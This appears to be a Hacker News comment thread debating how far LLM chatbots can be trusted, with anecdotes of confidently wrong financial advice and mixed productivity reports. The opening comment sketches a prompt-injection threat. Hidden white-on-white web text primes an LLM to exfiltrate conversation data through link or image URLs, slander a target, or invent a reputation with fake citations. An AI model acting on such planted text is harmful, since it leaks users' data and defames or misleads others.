Terr_
12 hours ago
At this point I can only hope that all these LLM products get exploited so massively and damning-ly that all credibility in them evaporates, before that misplaced trust causes too much insidious damage to everybody else.
I don't want to live in a world where some attacker can craft juuuust the right thing somewhere on the internet in white-on-white text that primes the big word-association-machine to do stuff like:
(A) Helpfully" display links/images where the URL is exfiltrating data from the current user's conversation.
(B) Confidently slandering a target individual (or group) as convicted of murder, suggesting that police ought to shoot first in order to protect their own lives.
(C) Responding that the attacker is a very respected person with an amazing reputation for one billion percent investment returns etc., complete with fictitious citations.
rsynnott
2 hours ago
I just saw a post on a financial forum where someone was asking advice on investing in individual stocks vs ETFs vs investment trusts (a type of closed-end fund); the context is that tax treatment of ETFs in Ireland is weird.
Someone responded with a long post showing scenarios with each, looked superficially authoritative... but on closer inspection, the tax treatment was wrong, the numbers were wrong, and it was comparing a gain from stocks held for 20 years with ETFs held for 8 years. When someone pointed out that they'd written a page of bullshit, the poster replied that they'd asked ChatGPT, and then started going on about how it was the future.
It's totally baffling to me that people are willing to see a question that they don't know the answer to, and then post a bunch of machine-generated rubbish as a reply. This all feels terribly dangerous; whatever about on forums like this, where there's at least some scepticism, a lot of laypeople are treating the output from these things as if it is correct.
pistoleer
2 hours ago
I share your experienced frustration dealing with these morons. It's an advanced evolution of the redditoresque personality that feels the need to have a say on every subject. ChatGPT is an idiot amplifier. Sure, it's nice for small pieces of sample code (if it doesn't make up nonexistent library functions).
FearNotDaniel
42 minutes ago
Tangential, but related anecdote. Many years ago, I (a European) had booked a journey on a long distance overnight train in South India. I had a reserved seat/berth, but couldn't work out where it was in the train. A helpful stranger on the platform read my ticket, guided me to the right carriage and showed me to my seat. As I began to settle in, a group of travellers turned up and began a discussion with my newfound friend, which rapidly turned into a shouting match until the train staff intervened and pointed out that my seat was in a completely different part of the train. The helpful soul by my side did not respond by saying "terribly sorry, I seem to have made a mistake" but instead shouted racist insults at his fellow countrymen on the grounds that they visibly belonged to a different religion to his own. All the while continuing to insist that he was right and they had somehow tricked him or cheated the system.
Moral: the world has always been full of bullshitters who want the rewards of answering someone else's question regardless of whether they actually know the facts. LLMs are just a new tool for these clowns to spray their idiotic pride all over their fellow humans.
s_dev
an hour ago
How is that any different though from regular false or fabricated information gleaned from Google, social media or any other source? I think we crossed the rubicon on generating nonsense faster than we can refute it long ago.
Independent thinking is important -- it's the vaccine for bullshit -- not everybody will subscribe or get it right but if enough do we have herd immunity from lies and errors and I think that was the correct answer and will be the correct answer going forward.
rsynnott
an hour ago
> How is that any different though from regular false or fabricated information gleaned from Google, social media or any other source?
This was so obviously nonsense that it could only have been written maliciously by a human. In practice, you won't find that much, at least on topics like this.
And I think people, especially laypeople, do tend to see the output of the bullshit generating robot as authoritative, because it _looks_ authoritative, and they don't understand how the bullshit generating robot works.
short_sells_poo
42 minutes ago
> How is that any different though from regular false or fabricated information gleaned from Google, social media or any other source?
It lowers the barrier to essentially nothing. Before, you'd have to do work to generate 2 pages of (superficially) plausible sounding nonsense. If it was complete gibberish, people would pick up very quickly.
Now you can just ask some chatbot a question and within a second you have an answer that looks correct. One has to actually delve into it and fact check the details to determine that it's horseshit.
This enables idiots like the redditor quoted by the parent to generate horseshit that looks fine to a layman. For all we know, the redditor wasn't being malicious, just an idiot who blindly trusts whatever the LLM vomits up.
It's not the users that are to blame here, it's the large wave of AI companies riding the sweet capital who are malicious in not caring one bit about the damage their rhetoric is causing. They hype LLMs as some sort of panacea - as expert systems that can shortcut or replace proper research.
This is the fundamental danger of LLMs. They have crossed past the uncanny valley. It requires a person of decent expertise to discover the mistakes generated and yet the models are being sold to the public as a robust tool. And the public tries the tools and in absence of being able to detect the bullshit, they use it and regurgitate the output as facts.
And then this gets compounded by these "facts" being fed back in as training material to the next generation of LLMs.
dyauspitr
9 hours ago
I use it so much everyday, it’s been a massive boost to my productivity, creativity and ability to learn. I would hate for it to crash and burn.
Terr_
8 hours ago
Ultimately it depends what the model is trained on, what you're using it for, and what error-rate/severity is acceptable.
My main beef here involves the most-popular stuff (e.g. ChatGPT) where they are being trained on much-of-the-internet, marketed as being good for just-about-everything, and most consumers aren't checking the accuracy except when one talks about eating rocks or using glue to keep cheese on pizza.
tomjen3
6 hours ago
Well if you use a gpt as a search engine and don’t check sources you get burned. That’s not an issue with the gpt.
Terr_
3 hours ago
That leads to a philosophical question: How widespread does dangerous misuse of a tool have to be before we can attribute the "fault" to the behavior/presentation of the tool itself, rather than to the user?
Casting around for a simple example... Perhaps any program with a "delete everything permanently" workflow. I think most of us would agree that a lack of confirmation steps would be a flaw in the tool itself, rather than in how it's being used, even though, yes, ideally the user would have been more careful.
Or perhaps the "tool" of US Social Security numbers, which as integers have a truly small surface-area for interaction. People were told not to piggyback on them for identifying customers--let alone authenticating them--but the resulting mess suggests that maybe "just educate people better" isn't enough to overcome the appeal of misuse.
short_sells_poo
37 minutes ago
This is like saying a gun that appears safe but that can easily backfire unless used by experts is completely fine. It's not an issue with the gun, the user should be competent.
Yes, it's technically true, but practically it's extremely disingenuous. LLMs are being marketed as the next generation research and search tool, and they are superbly powerful in the hands of an expert. An expert who doesn't blindly trust the output.
However, the public is not being educated about this at all, and it might not be possible to educate the public this way because people are fundamentally lazy and want to be spoonfed. But GPT is not a tool that can be used to spoonfeed results, because it ends up spoonfeeding you a whole bunch of shit. The shit is coated with enough good looking and smelling stuff that most of the public won't be able to detect it.
dyauspitr
7 hours ago
I’m directly referring to chatGPT.
peutetre
2 hours ago
> it’s been a massive boost to my productivity, creativity and ability to learn
What are concrete examples of the boosts to your productivity, creativity, and ability to learn? It seems to me that when you outsource your thinking to ChatGPT you'll be doing less of all three.
wheatgreaser
2 hours ago
i used to use gpt for asking really specific questions that i cant quite search on google, but i stopped using it when i realized it presented some of the information in a really misleading way, so now i have nothing
LightBug1
an hour ago
Getting to the heart of some legal matters, ChatGPT AND Gemini have helped 100 times better than a google search and my own brain.
huhkerrf
44 minutes ago
And how do you know it's accurate? By your own admission, you don't know enough to understand it via a Google search, how do you know it's not making up cases or interpretations like https://apnews.com/article/artificial-intelligence-chatgpt-f...
blagie
2 hours ago
For me:
* Rapid prototyping and trying new technologies.
* Editing text for typos, flipped words, and missing words
Ratelman
an hour ago
Exactly this for me as well - think people really underestimate how fast it allows you to iterate through prototyping. It's not outsourcing your thinking, it's more that it can generate a lot of the basics for you so you can infer the missing parts and tweak to suit your needs.
beretguy
2 hours ago
Not OP, but it helped me to generate story for a d&d character, cause I’m new to the game, and I’m not creative enough and generally done really care about back story. But regardless, i think ai causes far more harm than good.
afc
an hour ago
Not op, but for productivity, I'll mention one example: I use it to generate unit tests for my software, where it has saved me a lot of time.
cowoder
an hour ago
Won't it generate tests that prove the correctness of the code instead of the correctness of the application? As in: if my code is doing something wrong and I ask it to write tests for it, it will supply tests that pass on the wrong code instead of finding the problem in my code?
ruszki
5 hours ago
Did you learn real things, or hallucinated info? How do you know which?
mjlee
2 hours ago
I normally ask for pointers to sources and documentation. ChatGPT does a decent job, Claude is much better in my experience.
Often when starting down a new path we don't know what questions we should be asking, so asking a search engine is near impossible and asking colleagues is frustrating for both parties. Once I've got a summarised overview it's much easier to find the right books to read and people to ask to fill in the gaps.
emptiestplace
4 hours ago
This argument is specious and boring: everything an LLM outputs is "hallucinated" - just like with us. I'm not about to throw you out or even think less of you for making this mistake, though; it's just a mistake.
exe34
an hour ago
they keep making the mistake, almost as if it's part of their training that they are regurgitating!
throwaway3xo6
5 hours ago
Does it matter if the hallucinations compile and do the job?
palmfacehn
4 hours ago
Yes, if there are unintended side effects. Doubly so if the documentation warned about these specific pitfalls.
dyauspitr
5 hours ago
You always check multiple sources like I’ve been doing with all my Google searches previously. Anecdotally, having checked my sources, it’s usually right the vast majority of the time.
EGreg
7 hours ago
Actually, the LLMs are extremely useful. You’re just using them wrong.
There is nothing wrong with the LLMs, you just have to double-check everything. Any exploits and problems you think they have, have already been possible to do for decades with existing technology too, and many people did it. And for the latest LLMs, they are much better — but you just have to come up with examples to show that.
flohofwoe
3 hours ago
What's the point again of letting LLMs write code if I need to double check and understand each line anyway. Unless of course your previous way of programming was asking google "how do I..." and then copy-pasting code snippets from Stack Overflow without understanding the pasted code. For that situation, LLMs are indeed a minor improvement.
Xfx7028
2 hours ago
You can ask followup questions about the code it wrote. Without it you would need more effort and search more to understand the code snippet you found. For me it completely replaced googling.
ffsm8
2 hours ago
I get it for things you do on the side to broaden your horizon, but how often do you actually need to Google things for your day job?
Idk, of the top of my head, I can't even remember the last time exactly. It's definitely >6 month ago.
Maybe that's the reason some people are so enthusiastic about it? They just didn't really know the tools they're using yet. Which is normal I guess, everyone starts at some point.
hodgesrm
7 hours ago
> There is nothing wrong with the LLMs, you just have to double-check everything.
That does not seem very helpful. I don't spend a lot of time verifying each and every X509 cert my browser uses, because I know other people have spent a lot of time doing that already.
dambi0
an hour ago
If an official comes to my door with an identity card I can presumably verify who the person is (although often the advice is to phone the organisation and check if unsure) but I don’t necessarily believe everything they tell me
koe123
4 hours ago
The fact that hallucinates doesn’t make it useless for everything, but it does limit its scope. Respectfully, I think you haven’t applied it to the right problems if this is your perspective.
In some ways, its like saying the internet is useless because we already have the library and “anyone can just post anything on the internet”. The counter to this could be that an experienced user can sift through bullshit found on websites.
A argument can be made for LLMs; as such, they are a learnable tool. Sure it wont write valid moon lander code, but it can teach you how to get up and running with a new library.